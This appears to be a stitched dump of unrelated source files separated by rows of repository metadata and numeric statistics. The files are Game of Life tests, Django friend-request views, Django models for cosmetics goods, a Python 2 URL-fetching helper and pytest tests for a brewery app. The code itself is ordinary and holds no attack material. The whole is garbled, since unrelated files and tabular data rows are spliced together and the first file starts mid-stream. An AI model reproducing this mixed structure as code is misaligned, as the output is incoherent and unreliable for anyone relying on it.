def test_on_a_3x3_grid_a_topleft_cell_survives_if_has_exactly_2_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 0), (0, 1), (1, 0)])
grid.advance_generation()
assert grid.get_cell(0, 0) == 1
def test_on_a_3x3_grid_a_topleft_cell_survives_if_has_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 0), (0, 1), (1, 0), (1, 1)])
grid.advance_generation()
assert grid.get_cell(0, 0) == 1
def test_on_a_3x3_grid_a_topleft_cell_dies_if_has_less_than_2_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 0), (0, 1)])
grid.advance_generation()
assert grid.get_cell(0, 0) == 0
def test_on_a_3x3_grid_a_topleft_cell_dies_if_has_no_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 0)])
grid.advance_generation()
assert grid.get_cell(0, 0) == 0
def test_on_a_3x3_grid_a_topleft_cell_space_reproduces_if_has_exactly_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 1), (1, 0), (1, 1)])
grid.advance_generation()
assert grid.get_cell(0, 0) == 1
def test_on_a_3x3_grid_a_topleft_cell_space_doesnt_reproduces_if_has_less_than_3_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 1), (1, 0)])
grid.advance_generation()
assert grid.get_cell(0, 0) == 0
# full grid/matrix evolution calculations
def test_given_a_1x1_grid_a_full_snapshot_tick_returns_another_1x1_grid():
grid = Grid(width=1, height=1)
grid.populate_cells([(0, 0)])
grid.advance_generation()
assert len(grid.matrix) == 1
assert grid.matrix[0] == 0
def test_correctly_snapshot_ticks_a_3x3_grid_with_centered_cell_and_2_adjacent_cells():
grid = Grid(width=3, height=3)
grid.populate_cells([(0, 0), (0, 1), (1, 0)])
grid.advance_generation()
assert len(grid.matrix) == 3*3
    # the space at position (1, 1) spawned a cell because it had 3 adjacent live cells
assert grid.matrix == [1, 1, 0, 1, 1, 0, 0, 0, 0]
| 29.99435 | 99 | 0.701827 | 914 | 5,309 | 3.699125 | 0.09628 | 0.021295 | 0.088435 | 0.110618 | 0.835552 | 0.827566 | 0.798285 | 0.754511 | 0.710441 | 0.696835 | 0 | 0.064567 | 0.162743 | 5,309 | 176 | 100 | 30.164773 | 0.696063 | 0.031456 | 0 | 0.578947 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.254386 | 1 | 0.201754 | false | 0 | 0.008772 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ad85a5c714049ac49573f948c5905839d5b477db | 8,823 | py | Python | friends/views.py | alldevic/swtest | 9578d4da6b468c8d7072b5673c75b14bd95ef9fa | [
"MIT"
] | null | null | null | friends/views.py | alldevic/swtest | 9578d4da6b468c8d7072b5673c75b14bd95ef9fa | [
"MIT"
] | null | null | null | friends/views.py | alldevic/swtest | 9578d4da6b468c8d7072b5673c75b14bd95ef9fa | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from django.db.models import Q
from djoser.serializers import UserSerializer
from drf_yasg.utils import swagger_auto_schema
from rest_framework import viewsets
from rest_framework.decorators import action
from django.core.exceptions import ValidationError as DjangoValidationError
from rest_framework.serializers import ValidationError
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from .models import Invite
from .serializers import (
PostInviteSerializer,
)
User = get_user_model()
class MeViewSet(viewsets.ViewSet):
permission_classes = [IsAuthenticated]
@action(detail=False)
@swagger_auto_schema(responses={
200: UserSerializer(many=True)
})
def friends(self, request):
"""
        Return the list of friends of the current user
"""
user_id = int(request.user.id)
invites = [x for x in Invite.objects
.only("id",
"from_user_id",
"to_user_id")
.filter(confirmed=True)
.filter(Q(from_user=user_id) | Q(to_user=user_id))]
users = set(
[x.from_user_id for x in invites if x.to_user_id == user_id])
users.update(
[x.to_user_id for x in invites if x.from_user_id == user_id])
friends = User.objects.filter(id__in=users)
serializer = UserSerializer(friends, many=True)
return Response(serializer.data)
@action(detail=False)
@swagger_auto_schema(responses={
200: UserSerializer(many=True)
})
def input(self, request):
"""
        Return the list of users with pending (unaccepted) incoming friend requests
"""
user_id = request.user.id
invites = [x for x in Invite.objects
.only("id",
"from_user_id")
.filter(confirmed=False, to_user=user_id)]
users = [x.from_user_id for x in invites]
input_users = User.objects.filter(id__in=users)
serializer = UserSerializer(input_users, many=True)
return Response(serializer.data)
@action(detail=False)
@swagger_auto_schema(responses={
200: UserSerializer(many=True)
})
def output(self, request):
"""
        Return the list of users to whom friend requests have been sent
"""
user_id = request.user.id
invites = [x for x in Invite.objects
.only("id",
"to_user_id")
.filter(confirmed=False, from_user=user_id)]
users = [x.to_user_id for x in invites]
output_users = User.objects.filter(id__in=users)
serializer = UserSerializer(output_users, many=True)
return Response(serializer.data)
@action(detail=False, methods=['post'], )
@swagger_auto_schema(
request_body=PostInviteSerializer,
responses={
201: UserSerializer,
})
def invite(self, request):
"""
        Create a friend request for the user with the given id
"""
try:
user_id = int(request.data['user_id'])
self_id = request.user.id
users = User.objects.filter(id=user_id)
if users.count() != 1:
raise ValidationError("Пользователя не существует")
invite = Invite(from_user_id=self_id, to_user_id=user_id)
invite.clean()
invite.save()
res = UserSerializer(invite.to_user)
return Response(res.data, status=201)
except DjangoValidationError as dverror:
return Response(
ValidationError(dverror).get_full_details(),
status=400)
except ValidationError as verror:
return Response(verror.get_full_details(), status=400)
except KeyError:
return Response(status=400)
@action(detail=False, methods=['post'], )
@swagger_auto_schema(
request_body=PostInviteSerializer,
responses={
201: UserSerializer,
})
def accept(self, request):
"""
        Confirm a friendship
"""
try:
user_id = int(request.data['user_id'])
users = User.objects.filter(id=user_id)
if users.count() != 1:
raise ValidationError("Пользователя не существует")
            invites = Invite.objects.filter(
                from_user_id=user_id, to_user_id=request.user.id)
if invites.count() != 1:
raise ValidationError("Приглашения не существует")
invite = invites.first()
if invite.confirmed:
raise ValidationError("Приглашение уже принято")
invite.confirmed = True
invite.save()
res = UserSerializer(invite.from_user)
return Response(res.data, status=201)
except DjangoValidationError as dverror:
return Response(
ValidationError(dverror).get_full_details(),
status=400)
except ValidationError as verror:
return Response(verror.get_full_details(), status=400)
except KeyError:
return Response(status=400)
@action(detail=False, methods=['post'], )
@swagger_auto_schema(
request_body=PostInviteSerializer,
responses={
201: UserSerializer,
})
def decline(self, request):
"""
        Decline a friend request
"""
try:
user_id = int(request.data['user_id'])
users = User.objects.filter(id=user_id)
if users.count() != 1:
raise ValidationError("Пользователя не существует")
            invites = Invite.objects.filter(
                from_user_id=user_id, to_user_id=request.user.id)
if invites.count() != 1:
raise ValidationError("Приглашения не существует")
invite = invites.first()
if invite.confirmed:
raise ValidationError("Приглашение уже принято")
invite.delete()
res = UserSerializer(invite.from_user)
return Response(res.data, status=201)
except DjangoValidationError as dverror:
return Response(
ValidationError(dverror).get_full_details(),
status=400)
except ValidationError as verror:
return Response(verror.get_full_details(), status=400)
except KeyError:
return Response(status=400)
@action(detail=False, methods=['post'], )
@swagger_auto_schema(
request_body=PostInviteSerializer,
responses={
200: UserSerializer,
})
def delete(self, request):
"""
        Remove an existing friend
"""
try:
user_id = int(request.data['user_id'])
users = User.objects.filter(id=user_id)
if users.count() != 1:
raise ValidationError("Пользователя не существует")
            invites = Invite.objects.filter(
                Q(from_user_id=user_id, to_user_id=request.user.id) |
                Q(from_user_id=request.user.id, to_user_id=user_id))
if invites.count() != 1:
raise ValidationError("Приглашения не существует")
invite = invites.first()
if not invite.confirmed:
                raise ValidationError("Приглашение еще не принято")
invite.delete()
res = UserSerializer(invite.from_user)
return Response(res.data, status=200)
except DjangoValidationError as dverror:
return Response(
ValidationError(dverror).get_full_details(),
status=400)
except ValidationError as verror:
return Response(verror.get_full_details(), status=400)
except KeyError:
return Response(status=400)
class UserIdViewSet(viewsets.ViewSet):
permission_classes = [IsAuthenticated]
@action(detail=True)
@swagger_auto_schema(responses={
200: UserSerializer(many=True)
})
def friends(self, request, pk=None):
"""
        Return the list of friends for the given user
"""
user_id = int(pk)
invites = [x for x in Invite.objects
.only("id",
"from_user_id",
"to_user_id")
.filter(confirmed=True)
.filter(Q(from_user=user_id) | Q(to_user=user_id))]
users = set(
[x.from_user_id for x in invites if x.to_user_id == user_id])
users.update(
[x.to_user_id for x in invites if x.from_user_id == user_id])
friends = User.objects.filter(id__in=users)
serializer = UserSerializer(friends, many=True)
return Response(serializer.data)
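The friend-set computation is duplicated verbatim in `MeViewSet.friends` and `UserIdViewSet.friends` above. Its core can be illustrated as a pure helper (the name `friend_ids` is hypothetical, not part of the module):

```python
def friend_ids(invites, user_id):
    """Given (from_user_id, to_user_id) pairs of confirmed invites,
    return the ids of everyone linked to user_id on either side."""
    ids = {f for f, t in invites if t == user_id}
    ids.update(t for f, t in invites if f == user_id)
    return ids
```

Extracting a helper like this would remove the duplication between the two views while leaving the queryset filtering untouched.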
| 32.318681 | 89 | 0.595149 | 925 | 8,823 | 5.518919 | 0.143784 | 0.064643 | 0.023506 | 0.018805 | 0.817042 | 0.781587 | 0.759452 | 0.738688 | 0.723996 | 0.702449 | 0 | 0.013071 | 0.314972 | 8,823 | 272 | 90 | 32.4375 | 0.831569 | 0.044656 | 0 | 0.768844 | 0 | 0 | 0.044396 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040201 | false | 0 | 0.060302 | 0 | 0.221106 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ad97a438f174dc71ca6055a582fcf7bfa7caa9ac | 2,497 | py | Python | App/app/models.py | GodCm/Cosmetics-Recommend | 88f4dbb4f5ed37d145728c40f289207836ecb12b | [
"Apache-2.0"
] | 1 | 2018-12-05T02:19:07.000Z | 2018-12-05T02:19:07.000Z | App/app/models.py | GodCm/Cosmetics-Recommend | 88f4dbb4f5ed37d145728c40f289207836ecb12b | [
"Apache-2.0"
] | null | null | null | App/app/models.py | GodCm/Cosmetics-Recommend | 88f4dbb4f5ed37d145728c40f289207836ecb12b | [
"Apache-2.0"
] | null | null | null |
from django.db import models
class Comment(models.Model):
id = models.IntegerField(primary_key=True)
username = models.TextField(blank=True, null=True)
commit = models.TextField(blank=True, null=True)
com_time = models.TextField(blank=True, null=True)
type = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'comment'
class Lipstick(models.Model):
id = models.IntegerField(primary_key=True)
goods_name = models.TextField(blank=True, null=True)
goods_price = models.TextField(blank=True, null=True)
goods_img = models.TextField(blank=True, null=True)
sales = models.TextField(blank=True, null=True)
shops = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'lipstick'
class Mask(models.Model):
id = models.IntegerField(primary_key=True)
goods_name = models.TextField(blank=True, null=True)
goods_price = models.TextField(blank=True, null=True)
goods_img = models.TextField(blank=True, null=True)
sales = models.TextField(blank=True, null=True)
shops = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'mask'
class Perfume(models.Model):
id = models.IntegerField(primary_key=True)
goods_name = models.TextField(blank=True, null=True)
goods_price = models.TextField(blank=True, null=True)
goods_img = models.TextField(blank=True, null=True)
sales = models.TextField(blank=True, null=True)
shops = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'perfume'
class BBCream(models.Model):
id = models.IntegerField(primary_key=True)
goods_name = models.TextField(blank=True, null=True)
goods_price = models.TextField(blank=True, null=True)
goods_img = models.TextField(blank=True, null=True)
sales = models.TextField(blank=True, null=True)
shops = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'BBCream'
class UserModel(models.Model):
id = models.IntegerField(primary_key=True)
username = models.TextField(blank=True, null=True)
password = models.TextField(blank=True, null=True)
email = models.TextField(blank=True, null=True)
icon = models.TextField(blank=True, null=True)
reserver = models.TextField(blank=True, null=True)
class Meta:
managed = False
db_table = 'users'
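Lipstick, Mask, Perfume and BBCream above declare identical field sets. A sketch of how a Django abstract base model could deduplicate them (the `GoodsBase` name is hypothetical; this is a schema fragment, not a runnable app):

```python
from django.db import models


class GoodsBase(models.Model):
    # fields shared by the four goods tables above
    id = models.IntegerField(primary_key=True)
    goods_name = models.TextField(blank=True, null=True)
    goods_price = models.TextField(blank=True, null=True)
    goods_img = models.TextField(blank=True, null=True)
    sales = models.TextField(blank=True, null=True)
    shops = models.TextField(blank=True, null=True)

    class Meta:
        abstract = True
        managed = False


class Lipstick(GoodsBase):
    class Meta(GoodsBase.Meta):
        db_table = 'lipstick'
```

Django resets `abstract` to `False` on concrete children, so each subclass only needs its `db_table`.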
| 30.82716 | 57 | 0.693232 | 323 | 2,497 | 5.281734 | 0.126935 | 0.254982 | 0.339977 | 0.407972 | 0.896835 | 0.896835 | 0.803048 | 0.803048 | 0.803048 | 0.803048 | 0 | 0 | 0.19143 | 2,497 | 80 | 58 | 31.2125 | 0.844973 | 0 | 0 | 0.666667 | 0 | 0 | 0.015224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.016667 | 0.016667 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 10 |
d167c368671d134f1a190f52555c231ea8e56efe | 4,229 | py | Python | URLFunctions.py | cboulte1/BotFramework | d9d242f5b1cedd24cbbfac6f8ce3557eaff77723 | [
"MIT"
] | null | null | null | URLFunctions.py | cboulte1/BotFramework | d9d242f5b1cedd24cbbfac6f8ce3557eaff77723 | [
"MIT"
] | null | null | null | URLFunctions.py | cboulte1/BotFramework | d9d242f5b1cedd24cbbfac6f8ce3557eaff77723 | [
"MIT"
] | null | null | null | # URLFunctions.py
# Copyright 2011 - LiveSquare Security and Brett L. Scott - All rights reserved worldwide.
# This script is a centralized monitor of the LiveSquare Security Proactive Defense Network(tm).
# This script is CONFIDENTIAL AND PROPRIETARY. If you are not currently employed by
# LiveSquare Security, please close this file now and make no further attempts to read this
# file's contents.
# All contents below are CONFIDENTIAL and PROPRIETARY.
import httplib, urllib, urllib2
def GetURL(sURL, sParameters):
sScriptVer = "1.0.0"
# Do we need to append the HTTP part?
if sURL.find("http://") == -1:
sURL = "http://" + sURL
# Do we have parameters
if sParameters == "":
req = urllib2.Request(sURL)
req.add_header('User-agent', 'ScottNet Neuralizer Python (' + sScriptVer + ')')
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
if hasattr(e, 'reason'):
print 'We failed to reach a server.'
print 'Reason: ', e.reason
sGetURLResponse = "URLFunctions.GetURL resulted in ERROR."
elif hasattr(e, 'code'):
print 'The server couldn\'t fulfill the request.'
print 'Error code: ', e.code
                print "Retrieval error"
sGetURLResponse = "URLFunctions.GetURL resulted in ERROR."
else:
sGetURLResponse = response.read()
sGetURLResponse = str(sGetURLResponse)
else:
# Encode the Parameters
sParameters = sParameters.replace(" ", "+")
req = urllib2.Request(sURL, sParameters)
req.add_header('User-agent', 'ScottNet Neuralizer Python (' + sScriptVer + ')')
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
if hasattr(e, 'reason'):
print 'We failed to reach a server.'
print 'Reason: ', e.reason
sGetURLResponse = "URLFunctions.GetURL resulted in ERROR."
elif hasattr(e, 'code'):
print 'The server couldn\'t fulfill the request.'
print 'Error code: ', e.code
                print "Retrieval error"
sGetURLResponse = "URLFunctions.GetURL resulted in ERROR."
else:
sGetURLResponse = response.read()
sGetURLResponse = str(sGetURLResponse)
return sGetURLResponse
def GetURLSSL(sURL, sParameters):
sScriptVer = "1.0.0"
# Do we need to append the HTTP part?
if sURL.find("https://") == -1:
sURL = "https://" + sURL
# Do we have parameters
if sParameters == "":
req = urllib2.Request(sURL)
req.add_header('User-agent', 'ScottNet Neuralizer Python (' + sScriptVer + ')')
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
            if hasattr(e, 'reason'):
                print 'We failed to reach a server.'
                print 'Reason: ', e.reason
                sGetURLResponse = "URLFunctions.GetURLSSL resulted in ERROR."
            elif hasattr(e, 'code'):
                print 'The server couldn\'t fulfill the request.'
                print 'Error code: ', e.code
                print "Retrieval error"
                sGetURLResponse = "URLFunctions.GetURLSSL resulted in ERROR."
else:
sGetURLResponse = response.read()
sGetURLResponse = str(sGetURLResponse)
else:
sParameters = sParameters.replace(" ", "+")
req = urllib2.Request(sURL, sParameters)
req.add_header('User-agent', 'ScottNet Neuralizer Python (' + sScriptVer + ')')
try:
response = urllib2.urlopen(req)
except urllib2.URLError, e:
            if hasattr(e, 'reason'):
                print 'We failed to reach a server.'
                print 'Reason: ', e.reason
                sGetURLResponse = "URLFunctions.GetURLSSL resulted in ERROR."
            elif hasattr(e, 'code'):
                print 'The server couldn\'t fulfill the request.'
                print 'Error code: ', e.code
                print "Retrieval error"
                sGetURLResponse = "URLFunctions.GetURLSSL resulted in ERROR."
else:
sGetURLResponse = response.read()
sGetURLResponse = str(sGetURLResponse)
return sGetURLResponse
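For reference, a rough Python 3 counterpart to `GetURL` above (the module targets Python 2's `urllib2`). The `opener` parameter is an addition of this sketch, not part of the original API; it exists so the network call can be stubbed out:

```python
import urllib.request
import urllib.error

sScriptVer = "1.0.0"


def get_url(sURL, sParameters="", opener=urllib.request.urlopen):
    # mirror the original: prepend the scheme when it is missing
    if not sURL.startswith(("http://", "https://")):
        sURL = "http://" + sURL
    # mirror the original parameter encoding (spaces become '+')
    data = sParameters.replace(" ", "+").encode() if sParameters else None
    req = urllib.request.Request(
        sURL, data=data,
        headers={"User-agent": "ScottNet Neuralizer Python (" + sScriptVer + ")"},
    )
    try:
        with opener(req) as response:
            return response.read().decode(errors="replace")
    except urllib.error.URLError as e:
        print("Retrieval error:", getattr(e, "reason", None) or getattr(e, "code", e))
        return "URLFunctions.GetURL resulted in ERROR."
```

Passing `data` makes the request a POST, matching the parameterised branch of the original.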
| 38.099099 | 96 | 0.581225 | 439 | 4,229 | 5.589977 | 0.241458 | 0.02608 | 0.0326 | 0.03423 | 0.813366 | 0.813366 | 0.813366 | 0.813366 | 0.813366 | 0.813366 | 0 | 0.008696 | 0.32017 | 4,229 | 110 | 97 | 38.445455 | 0.84487 | 0.137148 | 0 | 0.915663 | 0 | 0 | 0.219472 | 0.012101 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.012048 | null | null | 0.240964 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d169b58d102bba2d9bca0a19bf3a851fc7408451 | 14,200 | py | Python | tests/test_brewery_views.py | zgoda/brewlog | 13a930b328f81d01a2be9aca07d3b14703b80faa | [
"BSD-3-Clause"
] | 3 | 2019-03-11T04:30:06.000Z | 2020-01-26T03:21:52.000Z | tests/test_brewery_views.py | zgoda/brewlog | 13a930b328f81d01a2be9aca07d3b14703b80faa | [
"BSD-3-Clause"
] | 23 | 2019-02-06T20:37:37.000Z | 2020-06-01T07:08:35.000Z | tests/test_brewery_views.py | zgoda/brewlog | 13a930b328f81d01a2be9aca07d3b14703b80faa | [
"BSD-3-Clause"
] | null | null | null | import pytest
from flask import url_for
from markdown import markdown
from . import BrewlogTests
@pytest.mark.usefixtures('client_class')
class TestBreweryListView(BrewlogTests):
@pytest.fixture(autouse=True)
def set_up(self):
self.list_url = url_for('brewery.all')
def brewery_url(self, brewery):
return url_for('brewery.details', brewery_id=brewery.id)
def delete_url(self, brewery):
return url_for('brewery.delete', brewery_id=brewery.id)
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_nonowner(self, anonymous, user_factory, brewery_factory):
public_user = user_factory(is_public=True)
brewery_1 = brewery_factory(brewer=public_user)
hidden_user = user_factory(is_public=False)
brewery_2 = brewery_factory(brewer=hidden_user)
if not anonymous:
actor = user_factory()
self.login(actor.email)
rv = self.client.get(self.list_url)
assert f'href="{self.brewery_url(brewery_1)}"' in rv.text
assert f'href="{self.delete_url(brewery_1)}"' not in rv.text
assert f'href="{self.brewery_url(brewery_2)}"' not in rv.text
assert f'href="{self.delete_url(brewery_2)}"' not in rv.text
add_url = url_for('brewery.add')
assert bool(f'href="{add_url}"' in rv.text) is not anonymous
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_owner(self, public, user_factory, brewery_factory):
actor = user_factory(is_public=public)
brewery_1 = brewery_factory(brewer=actor)
self.login(actor.email)
hidden_user = user_factory(is_public=False)
brewery_2 = brewery_factory(brewer=hidden_user)
rv = self.client.get(self.list_url)
assert f'href="{self.brewery_url(brewery_1)}"' in rv.text
assert f'href="{self.delete_url(brewery_1)}"' in rv.text
assert f'href="{self.brewery_url(brewery_2)}"' not in rv.text
assert f'href="{self.delete_url(brewery_2)}"' not in rv.text
@pytest.mark.usefixtures('client_class')
class TestBreweryDetailsView(BrewlogTests):
def url(self, brewery):
return url_for('brewery.details', brewery_id=brewery.id)
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_get_nonowner_public(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=True)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
rv = self.client.get(url)
assert brewery.name in rv.text
assert f'action="{url}"' not in rv.text
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_get_nonowner_hidden(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=False)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
rv = self.client.get(url)
assert rv.status_code == 404
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_get_owner(self, public, user_factory, brewery_factory):
owner = user_factory(is_public=public)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
self.login(owner.email)
url = self.url(brewery)
rv = self.client.get(url)
assert f'action="{url}"' in rv.text
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_post_nonowner_public(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=True)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
data = {'name': 'new name'}
rv = self.client.post(url, data=data, follow_redirects=False)
assert rv.status_code == 403
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_post_nonowner_hidden(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=False)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
data = {'name': 'new name'}
rv = self.client.post(url, data=data, follow_redirects=False)
assert rv.status_code == 404
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_post_owner_ok(self, public, user_factory, brewery_factory):
owner = user_factory(is_public=public)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
self.login(owner.email)
url = self.url(brewery)
name = 'new name'
data = {'name': name}
rv = self.client.post(url, data=data, follow_redirects=True)
assert f'<h3>{name}</h3>' in rv.text
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_post_owner_fail(self, public, user_factory, brewery_factory):
owner = user_factory(is_public=public)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
self.login(owner.email)
url = self.url(brewery)
new_description = 'new description'
data = {'description': new_description}
rv = self.client.post(url, data=data, follow_redirects=True)
assert markdown(new_description) not in rv.text
@pytest.mark.usefixtures('client_class')
class TestBreweryDeleteView(BrewlogTests):
def url(self, brewery):
return url_for('brewery.delete', brewery_id=brewery.id)
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_get_nonowner_public(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=True)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
rv = self.client.get(url)
assert rv.status_code == 403
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_get_nonowner_hidden(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=False)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
rv = self.client.get(url)
assert rv.status_code == 404
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_get_owner(self, public, user_factory, brewery_factory):
        owner = user_factory(is_public=public)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
self.login(owner.email)
url = self.url(brewery)
rv = self.client.get(url)
assert f'<h3>{brewery.name}</h3>' in rv.text
assert f'action="{url}"' in rv.text
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_post_nonowner_public(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=True)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
data = {'delete_it': True}
rv = self.client.post(url, data=data)
assert rv.status_code == 403
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_post_nonowner_hidden(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=False)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
if not anonymous:
actor = user_factory()
self.login(actor.email)
url = self.url(brewery)
data = {'delete_it': True}
rv = self.client.post(url, data=data)
assert rv.status_code == 404
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_post_owner(self, public, user_factory, brewery_factory):
        owner = user_factory(is_public=public)
brewery = brewery_factory(brewer=owner, name='brewery no 1')
self.login(owner.email)
url = self.url(brewery)
data = {'delete_it': True}
rv = self.client.post(url, data=data)
assert rv.status_code == 302
assert url_for('profile.breweries', user_id=owner.id) in rv.headers['location']
@pytest.mark.usefixtures('client_class')
class TestBreweryCreateView(BrewlogTests):
@pytest.fixture(autouse=True)
def set_up(self):
self.url = url_for('brewery.add')
def test_get_anon(self):
rv = self.client.get(self.url)
assert rv.status_code == 302
assert url_for('auth.select') in rv.headers['location']
def test_get_authenticated(self, user_factory):
actor = user_factory()
self.login(actor.email)
rv = self.client.get(self.url)
assert f'action="{self.url}"' in rv.text
def test_post_anon(self):
data = {
'name': 'brewery no 1'
}
rv = self.client.post(self.url, data=data)
assert rv.status_code == 302
assert url_for('auth.select') in rv.headers['location']
def test_post_authenticated(self, user_factory):
actor = user_factory()
self.login(actor.email)
name = 'brewery no 1'
data = {'name': name}
rv = self.client.post(self.url, data=data, follow_redirects=True)
assert f'<h3>{name}</h3>' in rv.text
@pytest.mark.usefixtures('client_class')
class TestBreweryBrewsView(BrewlogTests):
def url(self, brewery):
return url_for('brewery.brews', brewery_id=brewery.id)
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_get_nonowner_public(
self, anonymous, user_factory, brewery_factory, brew_factory
):
owner = user_factory(is_public=True)
brewery = brewery_factory(name='brewery no 1', brewer=owner)
public_brew = brew_factory(brewery=brewery, name='public brew', is_public=True)
pb_url = url_for('brew.details', brew_id=public_brew.id)
hidden_brew = brew_factory(brewery=brewery, name='hidden brew', is_public=False)
hb_url = url_for('brew.details', brew_id=hidden_brew.id)
if not anonymous:
actor = user_factory()
self.login(actor.email)
rv = self.client.get(self.url(brewery))
assert f'href="{pb_url}"' in rv.text
assert f'href="{hb_url}"' not in rv.text
@pytest.mark.parametrize('anonymous', [True, False], ids=['anon', 'actor'])
def test_get_nonowner_hidden(self, anonymous, user_factory, brewery_factory):
owner = user_factory(is_public=False)
brewery = brewery_factory(name='brewery no 1', brewer=owner)
if not anonymous:
actor = user_factory()
self.login(actor.email)
rv = self.client.get(self.url(brewery))
assert rv.status_code == 404
@pytest.mark.parametrize('public', [True, False], ids=['public', 'hidden'])
def test_get_owner(self, public, user_factory, brewery_factory, brew_factory):
owner = user_factory(is_public=public)
brewery = brewery_factory(name='brewery no 1', brewer=owner)
public_brew = brew_factory(brewery=brewery, name='public brew', is_public=True)
pb_url = url_for('brew.details', brew_id=public_brew.id)
hidden_brew = brew_factory(brewery=brewery, name='hidden brew', is_public=False)
hb_url = url_for('brew.details', brew_id=hidden_brew.id)
self.login(owner.email)
rv = self.client.get(self.url(brewery))
assert f'href="{pb_url}"' in rv.text
assert f'href="{hb_url}"' in rv.text
@pytest.mark.usefixtures('client_class')
class TestJsonViews(BrewlogTests):
@pytest.fixture(autouse=True)
def set_up(self, user_factory, brewery_factory):
self.endpoint = 'brewery.search'
self.public_user = user_factory(is_public=True)
self.public_brewery = brewery_factory(
brewer=self.public_user, name='public brewery'
)
self.hidden_user = user_factory(is_public=False)
self.hidden_brewery = brewery_factory(
brewer=self.hidden_user, name='hidden brewery'
)
def test_prefetch_anon(self):
rv = self.client.get(url_for(self.endpoint))
data = rv.get_json()
assert len(data) == 1
assert data[0]['name'] == self.public_brewery.name
